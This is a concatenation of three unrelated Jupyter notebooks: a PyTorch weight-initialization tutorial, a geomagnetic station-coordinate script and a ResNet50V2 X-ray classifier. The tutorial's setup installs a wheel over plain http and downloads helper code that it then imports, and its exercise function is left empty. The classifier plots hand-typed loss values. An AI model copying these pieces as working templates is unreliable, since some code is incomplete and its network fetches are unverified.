from wheel.pep425tags import get_abbr_impl, get_impl_ver, get_abi_tag
platform = '{}{}-{}'.format(get_abbr_impl(), get_impl_ver(), get_abi_tag())
cuda_output = !ldconfig -p|grep cudart.so|sed -e 's/.*\.\([0-9]*\)\.\([0-9]*\)$/cu\1\2/'
accelerator = cuda_output[0] if exists('/dev/nvidia0') else 'cpu'
!{sys.executable} -m pip install -q http://download.pytorch.org/whl/{accelerator}/torch-0.4.1-{platform}-linux_x86_64.whl torchvision >/dev/null
! wget https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/weight-initialization/helpers.py >/dev/null 2>&1
# PIL version installed in colab (5.3) is not working properly
# downgrade it to 4.2
!{sys.executable} -m pip uninstall -y -q pillow
!{sys.executable} -m pip install -q pillow==4.2
import torch
import numpy as np
from torchvision import datasets
import torchvision.transforms as transforms
from torch.utils.data.sampler import SubsetRandomSampler
# number of subprocesses to use for data loading
num_workers = 0
# how many samples per batch to load
batch_size = 100
# percentage of training set to use as validation
valid_size = 0.2
# convert data to torch.FloatTensor
transform = transforms.ToTensor()
# choose the training and test datasets
train_data = datasets.FashionMNIST(root='data', train=True,
download=True, transform=transform)
test_data = datasets.FashionMNIST(root='data', train=False,
download=True, transform=transform)
# obtain training indices that will be used for validation
num_train = len(train_data)
indices = list(range(num_train))
np.random.shuffle(indices)
split = int(np.floor(valid_size * num_train))
train_idx, valid_idx = indices[split:], indices[:split]
# define samplers for obtaining training and validation batches
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
# prepare data loaders (combine dataset and sampler)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,
sampler=train_sampler, num_workers=num_workers)
valid_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,
sampler=valid_sampler, num_workers=num_workers)
test_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size,
num_workers=num_workers)
# specify the image classes
classes = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
```
### Visualize Some Training Data
```
import matplotlib.pyplot as plt
%matplotlib inline
# obtain one batch of training images
dataiter = iter(train_loader)
images, labels = dataiter.next()
images = images.numpy()
# plot the images in the batch, along with the corresponding labels
fig = plt.figure(figsize=(25, 4))
for idx in np.arange(20):
ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])
ax.imshow(np.squeeze(images[idx]), cmap='gray')
ax.set_title(classes[labels[idx]])
```
## Define the Model Architecture
We've defined the MLP that we'll use for classifying the dataset.
### Neural Network
<img style="float: left" src="https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/weight-initialization/notebook_ims/neural_net.png" width=50%/>
* A 3 layer MLP with hidden dimensions of 256 and 128.
* This MLP accepts a flattened image (784-value long vector) as input and produces 10 class scores as output.
---
We'll test the effect of different initial weights on this 3 layer neural network with ReLU activations and an Adam optimizer.
The lessons you learn apply to other neural networks, including different activations and optimizers.
---
## Initialize Weights
Let's start looking at some initial weights.
### All Zeros or Ones
If you follow the principle of [Occam's razor](https://en.wikipedia.org/wiki/Occam's_razor), you might think setting all the weights to 0 or 1 would be the best solution. This is not the case.
With every weight the same, all the neurons at each layer are producing the same output. This makes it hard to decide which weights to adjust.
Let's compare the loss with all ones and all zero weights by defining two models with those constant weights.
Below, we are using PyTorch's [nn.init](https://pytorch.org/docs/stable/nn.html#torch-nn-init) to initialize each Linear layer with a constant weight. The init library provides a number of weight initialization functions that give you the ability to initialize the weights of each layer according to layer type.
In the case below, we look at every layer/module in our model. If it is a Linear layer (as all three layers are for this MLP), then we initialize those layer weights to be a `constant_weight` with bias=0 using the following code:
>```
if isinstance(m, nn.Linear):
nn.init.constant_(m.weight, constant_weight)
nn.init.constant_(m.bias, 0)
```
The `constant_weight` is a value that you can pass in when you instantiate the model.
```
import torch.nn as nn
import torch.nn.functional as F
# define the NN architecture
class Net(nn.Module):
def __init__(self, hidden_1=256, hidden_2=128, constant_weight=None):
super(Net, self).__init__()
# linear layer (784 -> hidden_1)
self.fc1 = nn.Linear(28 * 28, hidden_1)
# linear layer (hidden_1 -> hidden_2)
self.fc2 = nn.Linear(hidden_1, hidden_2)
# linear layer (hidden_2 -> 10)
self.fc3 = nn.Linear(hidden_2, 10)
# dropout layer (p=0.2)
self.dropout = nn.Dropout(0.2)
# initialize the weights to a specified, constant value
if(constant_weight is not None):
for m in self.modules():
if isinstance(m, nn.Linear):
nn.init.constant_(m.weight, constant_weight)
nn.init.constant_(m.bias, 0)
def forward(self, x):
# flatten image input
x = x.view(-1, 28 * 28)
# add hidden layer, with relu activation function
x = F.relu(self.fc1(x))
# add dropout layer
x = self.dropout(x)
# add hidden layer, with relu activation function
x = F.relu(self.fc2(x))
# add dropout layer
x = self.dropout(x)
# add output layer
x = self.fc3(x)
return x
```
### Compare Model Behavior
Below, we are using `helpers.compare_init_weights` to compare the training and validation loss for the two models we defined above, `model_0` and `model_1`. This function takes in a list of models (each with different initial weights), the name of the plot to produce, and the training and validation dataset loaders. For each given model, it will plot the training loss for the first 100 batches and print out the validation accuracy after 2 training epochs. *Note: if you've used a small batch_size, you may want to increase the number of epochs here to better compare how models behave after seeing a few hundred images.*
We plot the loss over the first 100 batches to better judge which model weights performed better at the start of training. **I recommend that you take a look at the code in `helpers.py` to look at the details behind how the models are trained, validated, and compared.**
Run the cell below to see the difference between weights of all zeros against all ones.
```
# initialize two NN's with 0 and 1 constant weights
model_0 = Net(constant_weight=0)
model_1 = Net(constant_weight=1)
import helpers
# put them in list form to compare
model_list = [(model_0, 'All Zeros'),
(model_1, 'All Ones')]
# plot the loss over the first 100 batches
helpers.compare_init_weights(model_list,
'All Zeros vs All Ones',
train_loader,
valid_loader)
```
As you can see the accuracy is close to guessing for both zeros and ones, around 10%.
The neural network is having a hard time determining which weights need to be changed, since the neurons have the same output for each layer. To avoid neurons with the same output, let's use unique weights. We can also randomly select these weights to avoid being stuck in a local minimum for each run.
A good solution for getting these random weights is to sample from a uniform distribution.
### Uniform Distribution
A [uniform distribution](https://en.wikipedia.org/wiki/Uniform_distribution) has the equal probability of picking any number from a set of numbers. We'll be picking from a continuous distribution, so the chance of picking the same number is low. We'll use NumPy's `np.random.uniform` function to pick random numbers from a uniform distribution.
>#### [`np.random_uniform(low=0.0, high=1.0, size=None)`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.uniform.html)
>Outputs random values from a uniform distribution.
>The generated values follow a uniform distribution in the range [low, high). The lower bound minval is included in the range, while the upper bound maxval is excluded.
>- **low:** The lower bound on the range of random values to generate. Defaults to 0.
- **high:** The upper bound on the range of random values to generate. Defaults to 1.
- **size:** An int or tuple of ints that specify the shape of the output array.
We can visualize the uniform distribution by using a histogram. Let's map the values from `np.random_uniform(-3, 3, [1000])` to a histogram using the `helper.hist_dist` function. This will be `1000` random float values from `-3` to `3`, excluding the value `3`.
```
helpers.hist_dist('Random Uniform (low=-3, high=3)', np.random.uniform(-3, 3, [1000]))
```
The histogram used 500 buckets for the 1000 values. Since the chance for any single bucket is the same, there should be around 2 values for each bucket. That's exactly what we see with the histogram. Some buckets have more and some have less, but they trend around 2.
Now that you understand the uniform function, let's use PyTorch's `nn.init` to apply it to a model's initial weights.
### Uniform Initialization, Baseline
Let's see how well the neural network trains using a uniform weight initialization, where `low=0.0` and `high=1.0`. Below, I'll show you another way (besides in the Net class code) to initialize the weights of a network. To define weights outside of the model definition, you can:
>1. Define a function that assigns weights by the type of network layer, *then*
2. Apply those weights to an initialized model using `model.apply(fn)`, which applies a function to each model layer.
This time, we'll use `weight.data.uniform_` to initialize the weights of our model, directly.
```
# takes in a module and applies the specified weight initialization
def weights_init_uniform(m):
classname = m.__class__.__name__
# for every Linear layer in a model..
if classname.find('Linear') != -1:
# apply a uniform distribution to the weights and a bias=0
m.weight.data.uniform_(0.0, 1.0)
m.bias.data.fill_(0)
# create a new model with these weights
model_uniform = Net()
model_uniform.apply(weights_init_uniform)
# evaluate behavior
helpers.compare_init_weights([(model_uniform, 'Uniform Weights')],
'Uniform Baseline',
train_loader,
valid_loader)
model_uniform.apply(lambda x: print(x.__class__.__name__))
```
---
The loss graph is showing the neural network is learning, which it didn't with all zeros or all ones. We're headed in the right direction!
## General rule for setting weights
The general rule for setting the weights in a neural network is to set them to be close to zero without being too small.
>Good practice is to start your weights in the range of $[-y, y]$ where $y=1/\sqrt{n}$
($n$ is the number of inputs to a given neuron).
Let's see if this holds true; let's create a baseline to compare with and center our uniform range over zero by shifting it over by 0.5. This will give us the range [-0.5, 0.5).
```
# takes in a module and applies the specified weight initialization
def weights_init_uniform_center(m):
classname = m.__class__.__name__
# for every Linear layer in a model..
if classname.find('Linear') != -1:
# apply a centered, uniform distribution to the weights
m.weight.data.uniform_(-0.5, 0.5)
m.bias.data.fill_(0)
# create a new model with these weights
model_centered = Net()
model_centered.apply(weights_init_uniform_center)
```
Then let's create a distribution and model that uses the **general rule** for weight initialization; using the range $[-y, y]$, where $y=1/\sqrt{n}$ .
And finally, we'll compare the two models.
```
# takes in a module and applies the specified weight initialization
def weights_init_uniform_rule(m):
classname = m.__class__.__name__
# for every Linear layer in a model..
if classname.find('Linear') != -1:
# get the number of the inputs
n = m.in_features
y = 1.0/np.sqrt(n)
m.weight.data.uniform_(-y, y)
m.bias.data.fill_(0)
# create a new model with these weights
model_rule = Net()
model_rule.apply(weights_init_uniform_rule)
# compare these two models
model_list = [(model_centered, 'Centered Weights [-0.5, 0.5)'),
(model_rule, 'General Rule [-y, y)')]
# evaluate behavior
helpers.compare_init_weights(model_list,
'[-0.5, 0.5) vs [-y, y)',
train_loader,
valid_loader)
```
This behavior is really promising! Not only is the loss decreasing, but it seems to do so very quickly for our uniform weights that follow the general rule; after only two epochs we get a fairly high validation accuracy and this should give you some intuition for why starting out with the right initial weights can really help your training process!
---
Since the uniform distribution has the same chance to pick *any value* in a range, what if we used a distribution that had a higher chance of picking numbers closer to 0? Let's look at the normal distribution.
### Normal Distribution
Unlike the uniform distribution, the [normal distribution](https://en.wikipedia.org/wiki/Normal_distribution) has a higher likelihood of picking number close to it's mean. To visualize it, let's plot values from NumPy's `np.random.normal` function to a histogram.
>[np.random.normal(loc=0.0, scale=1.0, size=None)](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.normal.html)
>Outputs random values from a normal distribution.
>- **loc:** The mean of the normal distribution.
- **scale:** The standard deviation of the normal distribution.
- **shape:** The shape of the output array.
```
helpers.hist_dist('Random Normal (mean=0.0, stddev=1.0)', np.random.normal(size=[1000]))
```
Let's compare the normal distribution against the previous, rule-based, uniform distribution.
<a id='normalex'></a>
#### TODO: Define a weight initialization function that gets weights from a normal distribution
> The normal distribution should have a mean of 0 and a standard deviation of $y=1/\sqrt{n}$
```
## complete this function
def weights_init_normal(m):
'''Takes in a module and initializes all linear layers with weight
values taken from a normal distribution.'''
classname = m.__class__.__name__
# for every Linear layer in a model
# m.weight.data shoud be taken from a normal distribution
# m.bias.data should be 0
## -- no need to change code below this line -- ##
# create a new model with the rule-based, uniform weights
model_uniform_rule = Net()
model_uniform_rule.apply(weights_init_uniform_rule)
# create a new model with the rule-based, NORMAL weights
model_normal_rule = Net()
model_normal_rule.apply(weights_init_normal)
# compare the two models
model_list = [(model_uniform_rule, 'Uniform Rule [-y, y)'),
(model_normal_rule, 'Normal Distribution')]
# evaluate behavior
helpers.compare_init_weights(model_list,
'Uniform vs Normal',
train_loader,
valid_loader)
```
The normal distribution gives us pretty similar behavior compared to the uniform distribution, in this case. This is likely because our network is so small; a larger neural network will pick more weight values from each of these distributions, magnifying the effect of both initialization styles. In general, a normal distribution will result in better performance for a model.
---
### Automatic Initialization
Let's quickly take a look at what happens *without any explicit weight initialization*.
```
## Instantiate a model with _no_ explicit weight initialization
## evaluate the behavior using helpers.compare_init_weights
```
As you complete this exercise, keep in mind these questions:
* What initializaion strategy has the lowest training loss after two epochs? What about highest validation accuracy?
* After testing all these initial weight options, which would you decide to use in a final classification model?
| github_jupyter |
## CGM Coordinates
Convert station coordinates from latitude and longitude to altitude adjusted corrected geomagnetic coordinates.
This is written as a notebook instead of apart of utils.py as it requires IGRF12 and AACGMv2 which can be tricky to install (at least in windows).
- cgm lat
- cmg lon
- mlt at 0 UT
- declination
- L-shell dipole
- L-shell Geopack IGRF
```
import igrf12
import aacgmv2
import pandas as pd
import numpy as np
import datetime as datetime
year = np.arange(1990,2000,1)
alt_km = 100.
stn_f = "..\\gmag\\Stations\\station_list.csv"
year
for yr in year:
dt = pd.to_datetime(str(yr))
df = pd.read_csv(stn_f, header=None, skiprows=1,
names = ['array','code','name','latitude','longitude'])
decl = np.zeros(df.shape[0])
cgm_lat = np.zeros(df.shape[0])
cgm_lon = np.zeros(df.shape[0])
l_dip = np.zeros(df.shape[0])
mlt = np.zeros(df.shape[0])
mlt_ut = np.zeros(df.shape[0])
# get declination, cgm coords, l-shell
for index, row in df.iterrows():
mag = igrf12.igrf(dt,glat=row['latitude'],glon=row['longitude'],alt_km=alt_km)
cgm_lat[index], cgm_lon[index], cgm_r = aacgmv2.convert_latlon(row['latitude'],row['longitude'], alt_km,dt,code='G2A')
if cgm_lon[index] <0:
cgm_lon[index] = 360+cgm_lon[index]
mlt_ut[index] = aacgmv2.convert_mlt(cgm_lon[index],datetime.datetime(int(yr),1,1,0,0,0),m2a=False)
mlt[index] = 24- mlt_ut[index]
l_dip[index] = 1./(np.cos(np.deg2rad(cgm_lat[index]))**2.)
decl[index] = mag['decl'].values[0]
if row['code'] == 'GILL':
print(yr,index,decl[index],cgm_lat[index],cgm_lon[index],l_dip[index])
df['cgm_latitude'] = cgm_lat
df['cgm_longitude'] = cgm_lon
df['declination'] = decl
df['lshell'] = l_dip
df['mlt_midnight'] = mlt
df['mlt_ut'] = mlt_ut
fn = '..\\gmag\\Stations\\{0:04d}_station_cgm.txt'.format(int(yr))
df.to_csv(fn,index=False,float_format="%E", na_rep='NaN')
```
```
# print the station DataFrame
df.head()
# Get only the Gill entry
df[df['code'] == 'GILL']
# Get all entryies between L of 3 and 7
# list the array, code, cgm longitude and l-shell
# allow pandas to print all output
pd.set_option('display.max_rows', None)
df[(df['lshell']>3) & (df['lshell']<7)][['array','code','cgm_longitude','lshell']]
# Get all stations with L greater than 7
df[(df['lshell']>7)][['array','code','cgm_longitude','lshell']]
import pandas as pd
for yr in range(2000,2020):
print(yr)
fn = '..\\gmag\\Stations\\{0:04d}_station_cgm.txt'.format(int(yr))
df = pd.read_csv(fn)
fn = 'D:\\GitHub\\gmag\\docs\\_data\\{0:04d}_station_cgm.csv'.format(int(yr))
df.to_csv(fn,index=False,float_format="%.2f", na_rep='NaN')
```
| github_jupyter |
```
import tensorflow as tf
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Conv2D,Flatten,MaxPool2D,BatchNormalization,GlobalAveragePooling2D, Dense, Dropout
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import os
from tensorflow.keras.applications import ResNet50V2
from sklearn.metrics import confusion_matrix, classification_report
import seaborn as sns
sns.set_style('darkgrid')
from keras.models import load_model
```
```
from google.colab import drive
drive.mount('/content/drive')
train_df = pd.read_csv('/content/drive/MyDrive/COURSES/CS231/train_split.txt', sep=" ", header=None)
train_df.columns = ['patient id', 'file_paths', 'labels', 'data source']
train_df = train_df.drop(['patient id', 'data source'], axis=1)
train_df.head()
test_df = pd.read_csv('/content/drive/MyDrive/COURSES/CS231/test_split.txt', sep=" ", header=None)
test_df.columns = ['patient id', 'file_paths', 'labels', 'data source']
test_df = test_df.drop(['patient id', 'data source'], axis=1)
test_df.head()
TRAIN_PATH = "/content/drive/MyDrive/COURSES/CS231/data/train"
TEST_PATH = "/content/drive/MyDrive/COURSES/CS231/data/test"
```
# Balancing Classes
```
train_df['labels'].value_counts()
file_count = 4649
samples = []
for category in train_df['labels'].unique():
category_slice = train_df.query("labels == @category")
samples.append(category_slice.sample(file_count, replace=False, random_state=1))
train_df = pd.concat(samples, axis=0).sample(frac=1.0, random_state=1).reset_index(drop=True)
print(train_df['labels'].value_counts())
print(len(train_df))
```
# Spliting train_df into train_df and valid_df
```
train_df, valid_df = train_test_split(train_df, train_size=0.9, random_state=0)
print(train_df.labels.value_counts())
print(valid_df.labels.value_counts())
print(test_df.labels.value_counts())
```
# Image Data Generators
```
batch_size = 32
img_height = 224
img_width = 224
target_size = (img_height, img_width)
train_datagen = ImageDataGenerator(preprocessing_function=tf.keras.applications.resnet_v2.preprocess_input,
horizontal_flip=True, zoom_range=0.1)
test_datagen = ImageDataGenerator(preprocessing_function=tf.keras.applications.resnet_v2.preprocess_input)
train_generator = train_datagen.flow_from_dataframe(train_df, directory=TRAIN_PATH, x_col='file_paths', y_col='labels',
target_size=target_size, batch_size=batch_size, color_mode='rgb', class_mode='categorical')
valid_generator = test_datagen.flow_from_dataframe(valid_df, directory=TRAIN_PATH, x_col='file_paths', y_col='labels',
target_size=target_size, batch_size=batch_size, color_mode='rgb', class_mode='categorical')
test_generator = test_datagen.flow_from_dataframe(test_df, directory=TEST_PATH, x_col='file_paths', y_col='labels',
target_size=target_size, batch_size=batch_size, color_mode='rgb', class_mode='categorical', shuffle = False)
```
# Create Model
```
base_model = ResNet50V2(include_top=False, weights="imagenet", input_shape=(img_height, img_width, 3))
for layer in base_model.layers[:190]:
layer.trainable = False
for i, layer in enumerate(base_model.layers):
print(i, layer.name, "-", layer.trainable)
model = tf.keras.Sequential([
base_model,
Flatten(),
BatchNormalization(),
Dense(256, activation='relu'),
Dropout(0.5),
BatchNormalization(),
Dense(128, activation='relu'),
Dropout(0.5),
BatchNormalization(),
Dense(64, activation='relu'),
Dropout(0.5),
BatchNormalization(),
Dense(3, activation='softmax'),
])
lr = 5e-3
model.compile(loss='categorical_crossentropy', optimizer=Adam(learning_rate=lr), metrics=['accuracy'])
model.summary()
```
# Callbacks
```
patience = 10
# stop_patience = 10
factor = 0.1
callbacks = [
ModelCheckpoint("resnet50v2-final.h5", save_best_only=True, verbose = 0),
# EarlyStopping(patience=stop_patience, monitor='val_loss', verbose=1),
ReduceLROnPlateau(monitor='val_loss', factor=factor, patience=patience, min_lr=1e-6, verbose=1)
]
```
# Model Training
```
epochs = 50
history = model.fit(train_generator, validation_data=valid_generator, epochs=epochs, callbacks=callbacks, verbose=1)
train_loss = [0.6487, 0.4469, 0.4074, 0.3849, 0.3576, 0.3427, 0.3471, 0.3380, 0.3410, 0.3383, 0.3361, 0.2940, 0.2783, 0.2717, 0.26, 0.2624, 0.2369, 0.2470, 0.2358, 0.2311, 0.2263, 0.2218, 0.2233, 0.2167, 0.2231, 0.2227, 0.2213, 0.2096, 0.2241, 0.2239, 0.2176, 0.2176, 0.2072, 0.2219, 0.2164, 0.2101, 0.2049, 0.2178, 0.2090, 0.2152, 0.2185, 0.2181, 0.2128, 0.2176, 0.2096, 0.2130, 0.2160, 0.2083, 0.2108, 0.2143]
val_loss = [0.3612, 0.3654, 0.6374, 0.3819, 0.5943, 1.1585, 0.4505, 0.4302, 0.5506, 0.6574, 1.1695, 1.3079, 1.7884, 3.1584, 5.1392, 4.6225, 4.8016, 4.9733, 4.8234, 5.7820, 6.4980, 4.4179, 4.2063, 4.1806, 4.2003, 5.5932, 1.5663, 1.1069, 3.2203, 2.6253, 3.3542, 4.0708, 4.2337, 5.4792, 4.8195, 3.8897, 4.0073, 4.3476, 5.2787, 5.0320, 5.5412, 3.6614, 3.8046, 4.0843, 3.6718, 3.9051, 4.3147, 4.5132, 6.02, 4.8454]
plt.plot(train_loss, label='Loss (training data)')
plt.plot(val_loss, label='Loss (validation data)')
plt.title('Loss for Training')
plt.ylabel('Loss')
plt.xlabel('No. epoch')
plt.legend(['train', 'validation'], loc="upper left")
plt.savefig('/content/drive/MyDrive/COURSES/CS231/results/resnet50_50-1')
plt.show()
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.savefig("plot/resnet50_plot.png")
plt.show()
```
# Predictions on Test Set
```
best_model = model
best_model.load_weights('/content/drive/MyDrive/COURSES/CS231/resnet50v2-final.h5')
best_model.evaluate(test_generator)
preds = best_model.predict(test_generator)
def print_info( test_gen, preds, print_code, save_dir, subject ):
class_dict=test_gen.class_indices
labels= test_gen.labels
file_names= test_gen.filenames
error_list=[]
true_class=[]
pred_class=[]
prob_list=[]
new_dict={}
error_indices=[]
y_pred=[]
for key,value in class_dict.items():
new_dict[value]=key # dictionary {integer of class number: string of class name}
# store new_dict as a text fine in the save_dir
classes=list(new_dict.values()) # list of string of class names
dict_as_text=str(new_dict)
dict_name= subject + '-' +str(len(classes)) +'.txt'
dict_path=os.path.join(save_dir, dict_name)
with open(dict_path, 'w') as x_file:
x_file.write(dict_as_text)
errors=0
for i, p in enumerate(preds):
pred_index=np.argmax(p)
true_index=labels[i] # labels are integer values
if pred_index != true_index: # a misclassification has occurred
error_list.append(file_names[i])
true_class.append(new_dict[true_index])
pred_class.append(new_dict[pred_index])
prob_list.append(p[pred_index])
error_indices.append(true_index)
errors=errors + 1
y_pred.append(pred_index)
if print_code !=0:
if errors>0:
if print_code>errors:
r=errors
else:
r=print_code
msg='{0:^28s}{1:^28s}{2:^28s}{3:^16s}'.format('Filename', 'Predicted Class' , 'True Class', 'Probability')
print_in_color(msg, (0,255,0),(55,65,80))
for i in range(r):
msg='{0:^28s}{1:^28s}{2:^28s}{3:4s}{4:^6.4f}'.format(error_list[i], pred_class[i],true_class[i], ' ', prob_list[i])
print_in_color(msg, (255,255,255), (55,65,60))
#print(error_list[i] , pred_class[i], true_class[i], prob_list[i])
else:
msg='With accuracy of 100 % there are no errors to print'
print_in_color(msg, (0,255,0),(55,65,80))
if errors>0:
plot_bar=[]
plot_class=[]
for key, value in new_dict.items():
count=error_indices.count(key)
if count!=0:
plot_bar.append(count) # list containg how many times a class c had an error
plot_class.append(value) # stores the class
fig1=plt.figure()
fig1.set_figheight(len(plot_class)/3)
fig1.set_figwidth(10)
plt.style.use('fivethirtyeight')
for i in range(0, len(plot_class)):
c=plot_class[i]
x=plot_bar[i]
plt.barh(c, x, )
plt.title( ' Errors by Class on Test Set')
if len(classes)<= 30:
# create a confusion matrix and a test report
y_true= np.array(labels)
y_pred=np.array(y_pred)
cm = confusion_matrix(y_true, y_pred )
clr = classification_report(y_true, y_pred, target_names=classes)
length=len(classes)
if length<8:
fig_width=8
fig_height=8
else:
fig_width= int(length * .5)
fig_height= int(length * .5)
fig2 = plt.figure(figsize=(fig_width, fig_height))
sns.heatmap(cm, annot=True, vmin=0, fmt='g', cmap='Blues', cbar=False)
plt.xticks(np.arange(length)+.5, classes, rotation= 90)
plt.yticks(np.arange(length)+.5, classes, rotation=0)
plt.xlabel("Predicted")
plt.ylabel("Actual")
plt.title("Confusion Matrix")
plt.savefig("/content/drive/MyDrive/COURSES/CS231/results/resnet50_50-4.png", dpi = 100)
plt.show()
print("Classification Report:\n----------------------\n", clr)
fig1.savefig("/content/drive/MyDrive/COURSES/CS231/results/resnet50_50-3.png", dpi = 100)
save_dir = '/content/drive/MyDrive/COURSES/CS231'
subject = "kq"
print_code = 0
print_info(test_generator, preds, print_code, save_dir, subject)
```
| github_jupyter |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.